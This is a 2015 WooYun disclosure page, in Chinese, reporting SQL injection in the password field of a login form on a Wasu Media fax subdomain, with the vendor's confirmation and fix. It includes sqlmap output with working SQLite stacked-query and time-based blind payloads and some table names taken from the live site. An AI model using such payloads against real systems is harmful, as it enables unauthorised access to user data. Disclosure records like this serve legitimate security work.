当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121960

漏洞标题:华数某分站存在SQL注入

相关厂商:华数传媒网络有限公司

漏洞作者:

提交时间:2015-06-23 15:52

修复时间:2015-08-09 10:38

公开时间:2015-08-09 10:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-23: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-07-05: 细节向核心白帽子及相关领域专家公开
2015-07-15: 细节向普通白帽子公开
2015-07-25: 细节向实习白帽子公开
2015-08-09: 细节向公众公开

简要描述:

**

详细说明:

地址:http://fax.wasuitv.com/default.aspx"
POST注入:

Place: POST
Parameter: pwd
Type: stacked queries
Title: SQLite > 2.0 stacked queries (heavy query)
Payload: __VIEWSTATE=/wEPDwUJODMxMjY2MzM2D2QWAgIBD2QWAgIPDw8WAh4EVGV4dAUb55S
o5oi35ZCN5oiW5a G56CB6ZSZ6K v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9
fFgEFB21lbXBhc3NyySPJunircnTGi856yoNga03SvQ==&__VIEWSTATEGENERATOR=CA0B0334&__EV
ENTVALIDATION=/wEWBgL2vcS4CwKvpuq2CALGmdGVDALAsZ/nAQKBk7XADAKM54rGBizbl1mCN6fA N
n7F0WGZ6zbyD e&username=QBya&pwd='; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5
00000000/2))))--&mempass=on&btn_ok=%E7%A1%AE%E8%AE%A4
Type: AND/OR time-based blind
Title: SQLite > 2.0 OR time-based blind (heavy query)
Payload: __VIEWSTATE=/wEPDwUJODMxMjY2MzM2D2QWAgIBD2QWAgIPDw8WAh4EVGV4dAUb55S
o5oi35ZCN5oiW5a G56CB6ZSZ6K v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9
fFgEFB21lbXBhc3NyySPJunircnTGi856yoNga03SvQ==&__VIEWSTATEGENERATOR=CA0B0334&__EV
ENTVALIDATION=/wEWBgL2vcS4CwKvpuq2CALGmdGVDALAsZ/nAQKBk7XADAKM54rGBizbl1mCN6fA N
n7F0WGZ6zbyD e&username=QBya&pwd=-7215' OR 5402=LIKE('ABCDEFG',UPPER(HEX(RANDOMB
LOB(500000000/2)))) AND 'FjMW'='FjMW&mempass=on&btn_ok=%E7%A1%AE%E8%AE%A4
---
do you want to exploit this SQL injection? [Y/n] y
[15:40:47] [INFO] the back-end DBMS is SQLite
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: SQLite
[15:40:47] [WARNING] on SQLite it is not possible to enumerate databases (use on
ly '--tables')
[15:40:47] [INFO] you can find results of scanning in multiple targets mode insi
de the CSV file 'D:\Python27\sqlmap\output\results-06212015_0340pm.csv'
[*] shutting down at 15:40:47


跑了下表名,太慢了

11.png


因为要出去,我就懒得跑了,列几个跑出来的表名:

[16:46:10] [INFO] resumed: ?qlite_sequence
[16:46:10] [INFO] resumed: user_state
[16:46:10] [INFO] resumed: folder
[16:46:10] [INFO] resumed: user_email

漏洞证明:

RT

修复方案:

**

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-06-25 10:37

厂商回复:

传真厂家己进行版本升级,改为用VPN访问:)感谢

最新状态:

暂无